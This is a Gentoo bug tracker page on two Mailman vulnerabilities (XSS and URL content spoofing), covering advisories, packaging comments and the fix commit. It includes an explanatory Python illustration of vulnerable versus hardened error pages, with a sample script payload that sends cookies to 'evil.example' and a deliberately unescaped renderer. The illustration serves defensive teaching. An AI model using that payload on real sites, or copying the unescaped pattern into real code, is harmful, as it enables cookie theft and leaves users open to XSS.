Bug 662902 (CVE-2018-0618, CVE-2018-13796) - <net-mail/mailman-2.1.29: multiple vulnerabilities (CVE-2018-{0618,13796})
Summary: <net-mail/mailman-2.1.29: multiple vulnerabilities (CVE-2018-{0618,13796})
Status: RESOLVED FIXED
Alias: CVE-2018-0618, CVE-2018-13796
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All
OS: Linux
Importance: Normal minor
Assignee: Gentoo Security
Whiteboard: B3 [glsa+ cve cleanup]
Reported: 2018-08-05 23:37 UTC by GLSAMaker/CVETool Bot
Modified: 2019-04-08 15:20 UTC (History)

Package list:
=net-mail/mailman-2.1.29
Runtime testing required: No
stable-bot: sanity-check+


Description GLSAMaker/CVETool Bot gentoo-dev 2018-08-05 23:37:34 UTC
CVE-2018-0618 (https://nvd.nist.gov/vuln/detail/CVE-2018-0618):
  Cross-site scripting vulnerability in Mailman 2.1.26 and earlier allows
  remote authenticated attackers to inject arbitrary web script or HTML via
  unspecified vectors.

CVE-2018-13796 (https://nvd.nist.gov/vuln/detail/CVE-2018-13796):
  An issue was discovered in GNU Mailman before 2.1.28. A crafted URL can
  cause arbitrary text to be displayed on a web page from a trusted site.
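The two advisories above describe different classes of problem: CVE-2018-0618 is script injection (XSS), while CVE-2018-13796 is attacker-chosen text being rendered on a trusted page even though it cannot execute. The following Python is an added illustration written for this page, not Mailman's code and not the actual vectors (which the advisories leave unspecified). The error-page handler, the "requested list name" as the reflected value, and the two sample inputs are constructed assumptions.

```python
import html
import re

# Constructed attacker-controlled inputs (assumptions, not from the advisory).
# A crafted URL is assumed to put them into the "requested list name" slot.
SPOOF_TEXT = "Security notice: your account is locked, call 555-0100 to unlock"
XSS_TEXT = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Strict allow-list for list names; anything else is not reflected at all.
LIST_NAME_RE = re.compile(r"^[A-Za-z0-9_.+-]{1,64}$")


def error_page_unescaped(requested):
    """Vulnerable: reflects the requested name verbatim (XSS class)."""
    return f"<p>No such list <em>{requested}</em></p>"


def error_page_escaped(requested):
    """Escaped: HTML-escaping blocks script injection, but the attacker's
    wording is still shown on the trusted site (content-spoofing class)."""
    return f"<p>No such list <em>{html.escape(requested, quote=True)}</em></p>"


def error_page_hardened(requested):
    """Hardened: reflect only names that pass the allow-list; otherwise render
    a fixed message that carries no attacker-controlled text."""
    if LIST_NAME_RE.match(requested):
        return f"<p>No such list <em>{html.escape(requested, quote=True)}</em></p>"
    return "<p>No such list. Check the address and try again.</p>"


def classify(requested):
    """For each renderer, report whether a raw <script> tag survives (XSS) and
    whether the attacker's text is visible at all once entities are decoded
    (content spoofing)."""
    pages = {
        "unescaped": error_page_unescaped(requested),
        "escaped": error_page_escaped(requested),
        "hardened": error_page_hardened(requested),
    }
    return {
        name: {
            "script_executes": "<script>" in page,
            "attacker_text_shown": requested in html.unescape(page),
        }
        for name, page in pages.items()
    }


if __name__ == "__main__":
    for label, sample in (("xss", XSS_TEXT), ("spoof", SPOOF_TEXT)):
        for renderer, result in classify(sample).items():
            print(f"{label:5} {renderer:10} {result}")
```

The escaped renderer is the interesting row: it is immune to the script payload, yet still displays the spoofed "security notice" under the site's own heading, which is exactly the kind of report that one reviewer will log as a CVE and another will consider marginal.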
Comment 1 Thomas Stein 2018-09-07 07:00:50 UTC
Any chance of getting mailman 2.1.29 into the portage tree?

thanks and cheers
t.
Comment 2 Hanno Boeck gentoo-dev 2018-09-07 10:58:05 UTC
I committed 2.1.29 now. (CVE-2018-0618 looks like a legit issue, CVE-2018-13796 however I'd hardly call a vuln.)
Comment 3 Thomas Stein 2018-09-07 11:01:01 UTC
Thanks Hanno.
Comment 4 Hanno Boeck gentoo-dev 2018-10-07 08:32:40 UTC
I think this can go stable.
Comment 5 Aaron Bauman Gentoo Infrastructure gentoo-dev Security 2019-03-26 20:57:12 UTC
@arches, please stabilize.
Comment 6 Agostino Sarubbo gentoo-dev 2019-03-27 20:04:59 UTC
amd64 stable
Comment 7 Thomas Deutschmann gentoo-dev Security 2019-03-27 23:21:27 UTC
x86 stable
Comment 8 Thomas Deutschmann gentoo-dev Security 2019-03-27 23:46:22 UTC
x86 stable
Comment 9 Yury German Gentoo Infrastructure gentoo-dev Security 2019-03-28 03:30:56 UTC
GLSA Vote: Yes
New GLSA Request filed.

PPC please continue stabilization.
Comment 10 Sergei Trofimovich gentoo-dev 2019-04-08 06:09:29 UTC
ppc stable
Comment 11 Aaron Bauman Gentoo Infrastructure gentoo-dev Security 2019-04-08 13:44:30 UTC
@maintainers, please drop vulnerable.
Comment 12 Larry the Git Cow gentoo-dev 2019-04-08 14:09:13 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=70805405dd792848e1fdb6926ac3ce236d88947f

commit 70805405dd792848e1fdb6926ac3ce236d88947f
Author:     Hanno <hanno@gentoo.org>
AuthorDate: 2019-04-08 14:08:29 +0000
Commit:     Hanno <hanno@gentoo.org>
CommitDate: 2019-04-08 14:09:01 +0000

    net-mail/mailman: Remove vulnerable version.
    
    Bug: https://bugs.gentoo.org/662902
    Signed-off-by: Hanno Boeck <hanno@gentoo.org>
    Package-Manager: Portage-2.3.62, Repoman-2.3.12

 net-mail/mailman/Manifest              |   1 -
 net-mail/mailman/mailman-2.1.26.ebuild | 167 ---------------------------------
 2 files changed, 168 deletions(-)
Comment 13 GLSAMaker/CVETool Bot gentoo-dev 2019-04-08 15:20:33 UTC
This issue was resolved and addressed in
 GLSA 201904-10 at https://security.gentoo.org/glsa/201904-10
by GLSA coordinator Aaron Bauman (b-man).